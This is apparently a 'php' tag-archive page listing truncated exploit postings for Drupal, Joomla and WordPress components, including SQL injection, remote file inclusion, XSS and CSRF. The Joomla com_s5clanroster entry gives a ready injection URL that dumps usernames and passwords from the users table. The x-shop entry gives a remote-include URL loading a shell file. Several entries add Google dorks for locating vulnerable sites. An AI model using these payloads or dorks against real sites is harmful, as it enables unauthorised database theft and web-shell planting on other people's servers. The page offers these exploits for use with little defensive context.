Tags archives: php

 

 


Drupal CMS 7.12 Multiple Vulnerabilities

# Exploit Title : Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities
# Date : 02-03-2012
# Author : Ivano Binetti (http://ivanobinetti.com)
# Software link : http://ftp.drupal.org/files/projects/drupal-7.12.zip
# Vendor site : http://drupal.org
# Version : 7.12 (and lower)
# Tested on : Debian Squeeze (6.0)
# Original Advisory: http://ivanobinetti.blogspot.com/2012/03/drupal-cms-712-latest-stable-release.html
# EDB-ID : 18564 (http://www.exploit-db.com/exploits/18564/)
# [...]

 


Joomla Discussions SQL Injection

# Title : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability
# Author : Red Security TEAM
# Date : 17/01/2012
# Risk : High
# Software : http://extensions.joomla.org/extensions/communication/forum/13560
# Tested On : CentOS
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM
# Home : http://RedSecurity.COM
#
# Exploit :
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct [...]

 


Joomla Component com_s5clanroster Sql Injection Vulnerability

.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Dork : inurl:”com_s5clanroster”
.:. Script : http://www.newone.org/s5-clan-roster-shape5-extensions

===[ Exploit ]===

Sql Injection:

www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql]

www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null’+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users– –

 


Joomla x-shop

Title : Joomla x-shop <= 1.7 Remote File Include Vulnerability

#Author: Crackers_Child
#cont@ct: crackers_child@sibersavascilar.com

Google Dorks : allinurl:”/com_x-shop/”

Download : http://mamboxchange.com/frs/?group_id=187&release_id=1047

Bug in admin.x-shop.php

<? include($mosConfig_absolute_path.'/administrator/components/com_x-shop/languages/'.$mosConfig_lang.'.php'); session_start();

Exploit:

http://www.site.com/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=Shell.txt?

greets:

All [...]

 


WordPress VideoJS multiple themes vulnerabilities

Affected products:

All versions of Covert VideoPress, Photolio, Source, Smartstart and Crius themes.

Vulnerable are web applications which are using VideoJS Flash Component 3.0.2 and previous versions. Version VideoJS Flash Component 3.0.2 is not vulnerable to mentioned XSS hole, except XSS via JS callbacks (as it can be read [...]

 

 


WordPress Newsletter 3.2.6 Cross Site Scripting

WordPress Newsletter Plugin 3.2.6 (alert) Reflected XSS Vulnerability

Vendor: Stefano Lissa
Product web page: http://wordpress.org/extend/plugins/newsletter/
Affected version: 3.2.6 and below

Summary: Newsletter is the perfect WordPress plugin for creating real newsletters and mail marketing system on your WordPress blog.

Desc: The plugin suffers from an XSS issue due to a failure [...]

 


Joomla Jnews 8.0.1 Cross Site Scripting

# Exploit Title: Joomla com_jnews Open Flash-Chart XSS
# Release Date: 14/05/2013
# Author: Deepankar Arora And Rafay Baloch
# Blog: http://rafayhackingarticles.net
# Vendor: www.joobi.co
# Versions Affected: 8.0.1 (latest) and earlier
# Google Dork: inurl:com_jnews

Description:

The vulnerability with Open-Flash Chart is a known vulnerability; however, it is integrated with com_jnews. The get-data [...]

 


Drupal elFinder File Mapper 6.x / 7.x CSRF

View online: http://drupal.org/node/1972942

* Advisory ID: DRUPAL-SA-CONTRIB-2013-044
* Project: elFinder file manager [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2013-April-17
* Security risk: Highly critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Request Forgery

DESCRIPTION

The elfinder module provides an AJAX-based file manager based on the [...]